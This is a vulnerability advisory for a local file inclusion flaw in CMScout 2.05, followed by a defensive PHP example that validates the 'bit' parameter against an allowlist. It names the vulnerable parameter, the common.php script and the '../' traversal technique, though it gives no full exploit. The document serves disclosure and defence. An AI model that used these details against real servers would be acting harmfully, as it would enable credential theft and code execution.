Vendor: CMScout
By: IRCRASH (R3d.W0rm)
CVSS: 8.8 (HIGH)
Local File Inclusion (LFI)
CWE: 98
Product Name: CMScout
Affected Version From: 02.05
Affected Version To: 02.05
Patch Exists: NO
Related CWE: N/A
CPE: a:cmscout:cmscout:2.05
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005
CMScout 2.05 LFI
A Local File Inclusion (LFI) vulnerability exists in CMScout 2.05 which allows an attacker to include a file from the local file system. An attacker can exploit this vulnerability by sending a crafted HTTP request containing directory traversal characters (e.g. '../') in the 'bit' parameter of the 'common.php' script. This can allow an attacker to read sensitive files from the server, such as configuration files containing database credentials. An attacker can also use this vulnerability to upload a malicious file to the server and execute arbitrary code.
Mitigation:
To mitigate this vulnerability, ensure that user input is properly sanitized and validated before being used in file operations.
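One way to apply this mitigation to a request parameter such as 'bit', shown as an added example that is not CMScout's own code: the untrusted value is only ever used as a key into a fixed allowlist, and the resolved path is checked for containment before it is loaded. The names `BITS_DIR`, `ALLOWED_BITS` and `resolve_bit`, the directory layout and the file names are hypothetical; PHP 8 is assumed.

```php
<?php
declare(strict_types=1);

// Hypothetical layout: every includable fragment lives in one directory.
// CMScout's real paths and file names are not given in this advisory.
const BITS_DIR = __DIR__ . '/bits';

// Allowlist mapping logical names to files (constructed sample values).
const ALLOWED_BITS = [
    'header' => 'header.php',
    'footer' => 'footer.php',
    'news'   => 'news.php',
];

// Pattern to avoid for this bug class (illustrative, not CMScout source):
//   include $_GET['bit'];   // request value reaches include unchecked

/** Map an untrusted 'bit' value to a file path, or null if it is rejected. */
function resolve_bit(mixed $raw): ?string
{
    // Reject arrays (?bit[]=x), empty values and any character outside a
    // strict set, so '.', '/', '\' and NUL never reach path handling.
    if (!is_string($raw) || preg_match('/\A[a-z0-9_]{1,32}\z/', $raw) !== 1) {
        return null;
    }
    // The request value is a lookup key only; it never becomes part of a path.
    if (!array_key_exists($raw, ALLOWED_BITS)) {
        return null;
    }
    $base = realpath(BITS_DIR);
    $path = realpath(BITS_DIR . '/' . ALLOWED_BITS[$raw]);
    if ($base === false || $path === false) {
        return null; // directory or file missing
    }
    // Defence in depth: after symlink resolution the file must sit under $base.
    return str_starts_with($path, $base . DIRECTORY_SEPARATOR) ? $path : null;
}

$target = resolve_bit($_GET['bit'] ?? null);
if ($target === null) {
    http_response_code(400);
    // json_encode keeps newlines and control bytes out of the log line.
    error_log('rejected bit parameter: ' . json_encode($_GET['bit'] ?? null));
    exit('Bad request');
}
require $target;
```

The rejection log line gives defenders a signal to alert on when traversal sequences are sent to this parameter.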